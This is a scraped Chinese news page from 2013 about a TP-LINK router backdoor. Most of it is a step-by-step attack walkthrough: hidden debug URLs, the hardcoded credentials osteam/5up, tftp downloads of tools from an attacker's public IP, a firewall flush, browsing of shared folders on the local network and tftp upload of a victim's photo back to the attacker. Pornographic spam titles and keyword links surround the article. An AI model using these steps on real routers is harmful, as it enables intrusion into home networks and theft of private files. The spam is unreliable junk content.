<tfoot id="mmm0m"><noscript id="mmm0m"></noscript></tfoot>
  • <tfoot id="mmm0m"></tfoot>
      <tfoot id="mmm0m"><noscript id="mmm0m"></noscript></tfoot>
    • <nav id="mmm0m"><sup id="mmm0m"></sup></nav>
      <nav id="mmm0m"><sup id="mmm0m"></sup></nav>
    • 日本牲交大片无遮挡,久久人搡人人玩人妻精品 ,色久综合网精品一区二区,高清无码不卡视频

      TP-LINK成隱私泄露最大渠道 70%用戶或受害

      來源:千龍網
      2013-04-12 10:04:00
      分享

      TP-LINK成隱私泄露最大渠道 70%用戶或受害

      近期,“TP-LINK漏洞門”事件被CNVD( 國家信息安全漏洞共享平臺 )曝光后,在社會上引起了極大的關注。由于TP-LINK的市場占有率達到70%,很多網友擔心自己的信息是否被泄露。

      據一位資深黑客介紹,TP-LINK路由器的后門漏洞危險程度遠遠大于目前披露的程度。他解釋,在攻擊漏洞的TP-LINK路由器時,并非一定要在本地連接路由器,而是可以通過遠程進入TP-LINK路由器,從而監控網友的所有上網行為,并且能夠竊取本地信息。也就是說,控制了用戶的TP-LINK路由器之后,也就可以監控用戶的上網行為,隨意從網友的電腦里竊取一切信息,不管是隱私信息還是重要資料都可以信手拈來,而用戶根本不知道。

      他做了一個演示,利用TP-LINK存在的后門漏洞,輕松的監控用戶的上網行為,用戶在QQ里面聊了什么,在淘寶上面買了什么東西,他都能夠一目了然,在他的眼里看來,用戶就是一個完全透明的人。而且,他還可以利用TP-LINK的漏洞進入用戶的電腦,不管用戶是在歐洲拍的婚紗照,還是在家里和愛人拍的隱私照,只要他想盜取隨時都可以,完全沒有隱私可言。

      他還介紹,TP-LINK的后門漏洞存在多年,一直都沒有被TP-LINK重視,而TP-LINK的市場占有率達到70%以上。所以,很多隱私泄露都與TP-LINK有關,不然黑客怎么可能獲得用戶的隱私照片和銀行賬號,很多都是利用TP-LINK的漏洞完成的,只是用戶根本不知道而已。國內用水星和迅捷的用戶也難免厄運,因為水星和迅捷都是TP-LINK的馬甲,只要能夠找到TP-LINK路由器的漏洞,就能隨意進入水星和迅捷路由器用戶的電腦。就目前來說,TP-LINK的路由器大多存在問題,要想保證絕對安全幾乎不大可能。

      以下是黑客利用TP-LINK路由器后門漏洞盜取用戶信息的演示:

        一、環境拓撲圖

      TP-LINK成隱私泄露最大渠道 70%用戶或受害

      圖1 環境拓撲圖

      拓撲圖說明:

      1、PC2 使用公網IP,或者是連接公網的路由器下的DMZ設備 ;

      2、TP-Link開啟遠程WEB訪問,示例中的8011為遠程WEB訪問端口 ;

      3、PC2要開啟TFTP服務器 ;

      4、TP-Link設備型號:TL-WR941N,實物圖請見附錄 。

      二、操作步驟

      1、在TP-Link設備聯網情況下開啟遠程WEB訪問,如圖2、圖3

      TP-LINK成隱私泄露最大渠道 70%用戶或受害

      2、PC2設備在聯網情況下,在地址欄輸入 http:// xxx.xxx.xxx.xxx:8011 /userRpmNatDebugRpm26525557/start_art.html (xxx.xxx.xxx.xxx為TP-Link設備的WAN口IP,8011為遠程WEB訪問的端口號),等待1分鐘左右出現如下頁面,如圖4所示

      TP-LINK成隱私泄露最大渠道 70%用戶或受害

      圖4

      3、PC2在地址欄輸入 http:// xxx.xxx.xxx.xxx:8011 /userRpmNatDebugRpm26525557/linux_cmdline.html ,出現TP-LINK設備的登錄頁面,輸入設備管理的用戶名和密碼(用戶名:admin,密碼:admin),進入以下頁面(如圖5所示),這個頁面需要的用戶名是:osteam,密碼是:5up。在這個頁面我們就可以大展拳腳了。接下來我們就利用漏洞來訪問TP-link局域網下的共享

      TP-LINK成隱私泄露最大渠道 70%用戶或受害

      圖5

      4、PC2開啟tftp服務器,并在tftp服務器路徑下放置 busybox / libbigballofmud.so / smbclient / smbtree 文件(后面會將這幾個文件通過tftp導入到TP-Link設備的/tmp目錄下)。在設備頁面的指令欄輸入 tftp -g -r busybox aaa.aaa.aaa.aaa(aaa.aaa.aaa.aaa為PC2的公網IP地址)。出現如下頁面(圖6)

      TP-LINK成隱私泄露最大渠道 70%用戶或受害

      7、在指令欄輸入 iptables -P INPUT ACCEPT / iptables -P FORWARD ACCEPT / iptables –F ,如圖9。這幾條命令是改變防火墻的過濾規則,操作后,該設備的防火墻就形同虛設了。

      TP-LINK成隱私泄露最大渠道 70%用戶或受害

      10、在telnet窗口輸入cd /tmp,進入該目錄后先后輸入 tftp -g -r libbigballofmud.so aaa.aaa.aaa.aaa/ tftp -g -r smbclient aaa.aaa.aaa.aaa/ tftp -g -r smbtree aaa.aaa.aaa.aaa(這幾個命令是將libbigballofmud.so/smbtree/smbclient通過TFTP導入到TP-Link的/tmp目錄下,所以要確保PC2開啟TFTP服務器)。如圖12所示,已成功導入

      TP-LINK成隱私泄露最大渠道 70%用戶或受害

      圖12

      11、在telnet界面輸入以下命令(如圖13所示)

      mount tmpfs /usr -t tmpfs

      /tmp/busybox mkdir -p /usr/lib

      /tmp/busybox cp /tmp/*so* /usr/lib/ -fr

      /tmp/busybox ln -s /usr/lib/libbigballofmud.so /usr/lib/libbigballofmud.so.0

      chmod 777 smbtree

      chmod 777 smbclient

      TP-LINK成隱私泄露最大渠道 70%用戶或受害

      圖13

      12、在/tmp目錄下執行./smbtree命令,即可搜索到該局域網下的共享文件信息,圖14

      TP-LINK成隱私泄露最大渠道 70%用戶或受害

      圖14

      13、執行./smbclient //bbbb/bbbbbb(//bbbb/bbbbbb為圖14搜索到的一個共享文件目錄),密碼為空,進入文件夾后執行ls,顯示該文件夾下的文件類容,如圖15

      TP-LINK成隱私泄露最大渠道 70%用戶或受害

      圖15

      14、通過索引目錄,可以查詢到每一個目錄下的文件信息,如/mnt/files/cherryblossoms1.jpg。如圖16所示。接下來我們就看看cherryblossoms1.jpg是一個什么圖片。

      TP-LINK成隱私泄露最大渠道 70%用戶或受害

      圖16

      15、將共享文件拷貝到TP-Link設備上的/tmp目錄下,執行命令get ccc(ccc為要拷貝的共享文件,如圖17中的cherryblossoms1.jpg)

      TP-LINK成隱私泄露最大渠道 70%用戶或受害

      圖17

      16、將文件通過tftp拷貝到本地設備上,執行命令 /tmp/busybox tftp -p -l ccc aaa.aaa.aaa.aaa。如圖18所示

      TP-LINK成隱私泄露最大渠道 70%用戶或受害

      TP-LINK成隱私泄露最大渠道 70%用戶或受害

      圖20

      注意事項:

      1、TP-Link設備需要開啟遠程WEB訪問,示例中的8011為遠程WEB訪問的端口

      2、本地設備最好使用公網IP,或者是連接公網的路由器下的DMZ設備

      3、本地設備要開啟TFTP服務器

      4、 busybox / libbigballofmud.so / smbclient / smbtree 需要拷貝在TP-Link下的/tmp目錄下

      5、示例中的xxx.xxx.xxx.xxx為TP-link設備WAN口IP,aaa.aaa.aaa.aaa為PC2的公網IP,/ /bbbb/bbbbbb為搜索到的一個共享目錄,ccc為共享目錄下的一個共享文件

      6、需要用到的工具有: tftpd32.exe 、 busybox 、 libbigballofmud.so 、 smbclient 、 smbtree

      附錄: TL-WR941N 實物圖

      TP-LINK成隱私泄露最大渠道 70%用戶或受害

      圖21

      TP-LINK成隱私泄露最大渠道 70%用戶或受害

      分享
      標簽:

      推薦

      主站蜘蛛池模板: 亚洲自偷自拍另类第1页| …日韩人妻无码精品一专区| 中中文字幕亚洲无线码| 午夜激情婷婷| 少妇高清一区二区免费看| 亚洲一区二区三区四区五区六区| 久久成人国产精品无码| 色亚洲成人| 手机永久无码国产av毛片| 亚洲日产无码中文字幕| 女m羞辱调教视频网站| 菠萝菠萝蜜午夜视频在线播放观看 | 亚洲国产成人无码专区| 久热在线播放中文字幕| 免费又黄又爽又猛大片午夜| 无码人妻黑人中文字幕| 欧美大片va欧美在线播放| 鲁丝无码一区二区三区| 26uuu在线亚洲欧美| 特黄特色大片免费播放| 国产午夜一级淫片| 在线综合亚洲欧美网站| 中文字幕免费无码专区| 九九亚洲女同一区| 久久婷婷五月国产色综合| 亚洲日韩看片成人无码| 亚洲午夜片| 国产熟妇精品高潮一区二区三区 | 日韩中文字幕免费视频| 中文字幕乱妇无码AV在线| 精品视频一区二区| 在线天堂最新版资源| 国产一在线观看| 色噜噜久久综合伊人一本| 鹤庆县| 无套内谢老熟女| 精品国产美女福到在线不卡| 顺义区| 又湿又紧又大又爽a视频| 久久久精品欧美一区二区免费| 亚洲欧美中文字幕|